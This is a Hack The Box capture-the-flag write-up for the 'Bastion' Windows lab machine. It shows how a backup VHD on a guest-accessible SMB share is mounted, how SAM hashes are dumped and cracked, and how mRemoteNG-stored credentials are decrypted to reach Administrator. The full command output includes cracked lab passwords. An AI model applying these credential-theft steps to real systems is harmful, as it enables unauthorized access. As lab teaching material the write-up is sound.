Bastion - [HTB]

Marmeus

Introduction

Bastion is an easy Windows machine from Hack The Box where the attacker has to mount a VHD file available on the SMB service, then crack the credentials stored inside it to obtain the user flag, and finally find and decrypt the credentials saved by an installed program to get a shell as Administrator.

Enumeration

As always, let's start by finding all open ports on the machine with nmap.

kali@kali:~/Documents/HTB/Bastion$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.134
Warning: 10.10.10.134 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.134
Host is up (0.041s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
[...]
# Nmap done at Mon Jul  5 11:24:03 2021 -- 1 IP address (1 host up) scanned in 82.59 seconds

Then we continue with a deeper scan of every open port to get more information about each service.

kali@kali:~/Documents/HTB/Bastion$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.134
Nmap scan report for 10.10.10.134
Host is up (0.052s latency).

PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
[...]
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m52s, deviation: 1h09m15s, median: 6s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-05T17:41:39+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-05T15:41:40
|_  start_date: 2021-07-05T05:58:41

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul  5 11:41:40 2021 -- 1 IP address (1 host up) scanned in 64.96 seconds

Because there is an SMB service, let's enumerate its shares.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ smbmap -H 10.10.10.134 -u guest
[+] IP: 10.10.10.134:445        Name: 10.10.10.134                                      
[\] Work[!] Unable to remove test directory at \\10.10.10.134\Backups\ZRVPGAGWIF, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        Backups                                                 READ, WRITE
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

Looking inside the Backups share, there is a note warning us that we shouldn't download the entire share.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ smbclient  //10.10.10.134/Backups -N
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jul  5 12:33:05 2021
  ..                                  D        0  Mon Jul  5 12:33:05 2021
  nmap-test-file                      A      260  Mon Jul  5 12:00:49 2021
  note.txt                           AR      116  Tue Apr 16 06:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 07:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 07:44:02 2019

                7735807 blocks of size 4096. 2761155 blocks available
smb: \> get note.txt 
getting file \note.txt of size 116 as note.txt (0.7 KiloBytes/sec) (average 0.7 KiloBytes/sec)
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion/smb$ cat note.txt 

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Searching through the different folders, there is a heavy 5GB file named 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd. VHD (Virtual Hard Disk) is a file format representing a virtual hard disk drive (HDD).

smb: \> cd "WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351"
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
  .                                  Dn        0  Fri Feb 22 07:45:32 2019
  ..                                 Dn        0  Fri Feb 22 07:45:32 2019
  9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd     An 37761024  Fri Feb 22 07:44:03 2019
  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd     An 5418299392  Fri Feb 22 07:45:32 2019
  BackupSpecs.xml                    An     1186  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml     An     1078  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml     An     8930  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml     An     6542  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml     An     2894  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml     An     1488  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml     An     1484  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml     An     3844  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml     An     3988  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml     An     7110  Fri Feb 22 07:45:32 2019
  cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml     An  2374620  Fri Feb 22 07:45:32 2019

                7735807 blocks of size 4096. 2761155 blocks available
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> 

Because we cannot download this file, we mount the SMB share as a network folder instead. To do so, we execute the following commands.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ sudo mkdir /mnt/smb 
kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ sudo mount -t cifs //10.10.10.134/Backups /mnt/smb/
kali@kali:/mnt/smb$ ls
nmap-test-file  note.txt  SDT65CB.tmp WindowsImageBackup

Exploitation

Now that we have access to the file we can mount it using guestmount.

kali@kali:/mnt/smb$ sudo apt-get install libguestfs-tools -y
kali@kali:/mnt/smb$ sudo mkdir /mnt/vhd
kali@kali:/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ sudo guestmount --add  9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
kali@kali:/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351$ sudo su
root@kali:/mnt/vhd# ls
'$Recycle.Bin'   config.sys                pagefile.sys   ProgramData      Recovery                     Users
 autoexec.bat   'Documents and Settings'   PerfLogs      'Program Files'  'System Volume Information'   Windows

The virtual hard drive contains the SAM and SYSTEM registry hives, where the local user credentials (password hashes) are stored. To extract them we use the tool samdump2.

root@kali:/mnt/vhd/Windows/System32/config# samdump2 SYSTEM SAM  | tee /home/kali/Documents/HTB/Bastion/creds.txt
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Now hashcat is able to recover L4mpje's password from the NTLM hash.

kali@kali:~/Documents/HTB/Bastion$ hashcat -m 1000 creds.txt /usr/share/wordlists/rockyou.txt                   
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]                                      
=============================================================================================================================                                      
* Device #1: pthread-Intel(R) Core(TM) i5-10210U CPU @ 1.60GHz, 5844/5908 MB (2048 MB allocatable), 4MCU
Host memory required for this attack: 65 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

31d6cfe0d16ae931b73c59d7e0c089c0:                
26112010952d963c8dc4217daec986d9:bureaulampje
[...]
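As an added example (not part of the original writeup), the following Python parses the samdump2 output shown above and triages it the way a backup audit would: which accounts have no password set (the empty-string NT hash 31d6cfe0d16ae931b73c59d7e0c089c0, which is why hashcat's first result line above is blank), whether any legacy LM hash is still stored, and which enabled accounts have a real NT hash worth protecting. The function names parse_samdump and triage are my own; the sample input is the three dump lines from this page.

```python
import re
from collections import namedtuple

# LM and NT hashes of the empty string; both appear in the samdump2 output above
# (every account has the empty LM hash, the two disabled ones an empty NT hash).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One samdump2/pwdump line: [*disabled*] user:rid:lmhash:nthash:::
_LINE = re.compile(r"^(?P<dis>\*disabled\*\s+)?(?P<user>[^:]+):(?P<rid>\d+):"
                   r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

SamEntry = namedtuple("SamEntry", "user rid lm_hash nt_hash disabled")

def parse_samdump(text):
    """Parse samdump2 output into SamEntry records; blank lines are skipped."""
    entries = []
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        m = _LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised samdump2 line: {line!r}")
        entries.append(SamEntry(m["user"], int(m["rid"]), m["lm"].lower(),
                                m["nt"].lower(), m["dis"] is not None))
    return entries

def triage(entries):
    """Audit the dump: accounts with a blank password, accounts still storing a
    legacy LM hash, and the NT hashes of enabled accounts (the only hashes that
    a wordlist hit like the one above turns into a usable login)."""
    report = {"blank_password": [], "lm_stored": [], "enabled_hashes": {}}
    for e in entries:
        if e.nt_hash == EMPTY_NT:
            report["blank_password"].append(e.user)
        if e.lm_hash != EMPTY_LM:
            report["lm_stored"].append(e.user)
        if not e.disabled and e.nt_hash != EMPTY_NT:
            report["enabled_hashes"][e.user] = e.nt_hash
    return report

# The three lines of the samdump2 output above, embedded so this runs offline.
SAMPLE = """\
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""

if __name__ == "__main__":
    for key, value in triage(parse_samdump(SAMPLE)).items():
        print(f"{key}: {value}")
```

On this dump the report shows the two blank-password accounts are disabled and L4mpje is the only enabled account whose hash a wordlist could turn into a working login.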

These credentials can be used to log in as L4mpje through SSH.

kali@kali:~/Documents/HTB/Bastion$ ssh L4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.                
L4mpje@10.10.10.134's password: 
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>  

Privilege Escalation

Looking through the machine's file system, an unusual program named mRemoteNG shows up. mRemoteNG is a fork of mRemote: an open source, tabbed, multi-protocol remote connections manager for Windows.

l4mpje@BASTION C:\Program Files (x86)>dir                                                                           
 Volume in drive C has no label.
 Volume Serial Number is 0CB3-C487
 Directory of C:\Program Files (x86)
22-02-2019  15:01    <DIR>          .                                                                               
22-02-2019  15:01    <DIR>          ..             
16-07-2016  15:23    <DIR>          Common Files
23-02-2019  10:38    <DIR>          Internet Explorer
16-07-2016  15:23    <DIR>          Microsoft.NET
22-02-2019  15:01    <DIR>          mRemoteNG
23-02-2019  11:22    <DIR>          Windows Defender
23-02-2019  10:38    <DIR>          Windows Mail
23-02-2019  11:22    <DIR>          Windows Media Player
16-07-2016  15:23    <DIR>          Windows Multimedia Platform
16-07-2016  15:23    <DIR>          Windows NT
23-02-2019  11:22    <DIR>          Windows Photo Viewer
16-07-2016  15:23    <DIR>          Windows Portable Devices
16-07-2016  15:23    <DIR>          WindowsPowerShell
               0 File(s)              0 bytes
              14 Dir(s)  11.308.552.192 bytes free 

Searching for where mRemoteNG stores its credentials, there is a post on Reddit saying that they are stored at %appdata%\mRemoteNG\confCons.xml.

l4mpje@BASTION C:\Program Files (x86)>type  %appdata%\mRemoteNG\confCons.xml  
[...]      
Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
[...]
Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB"

Although they are encrypted, we can decrypt them using mremoteng_decrypt.

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ wget https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
--2021-07-05 14:55:13--  https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1535 (1.5K) [text/plain]
Saving to: ‘mremoteng_decrypt.py’

mremoteng_decrypt.py                     100%[=================================================================================>]   1.50K  --.-KB/s    in 0s

2021-07-05 14:55:13 (3.12 MB/s) - ‘mremoteng_decrypt.py’ saved [1535/1535]

kali@kali:/media/sf_2_MisPostsBlog/HTB/Bastion$ python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2

The Administrator's password can be used to access the machine as Administrator through SSH and get the root flag.

kali@kali:~/Documents/HTB/Bastion$ ssh Administrator@10.10.10.134
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>type Desktop\root.txt
[CENSORED]

Finally, if you want to unmount the folders under /mnt, execute the following commands.

root@kali:~# umount /mnt/smb
root@kali:~# guestunmount /mnt/vhd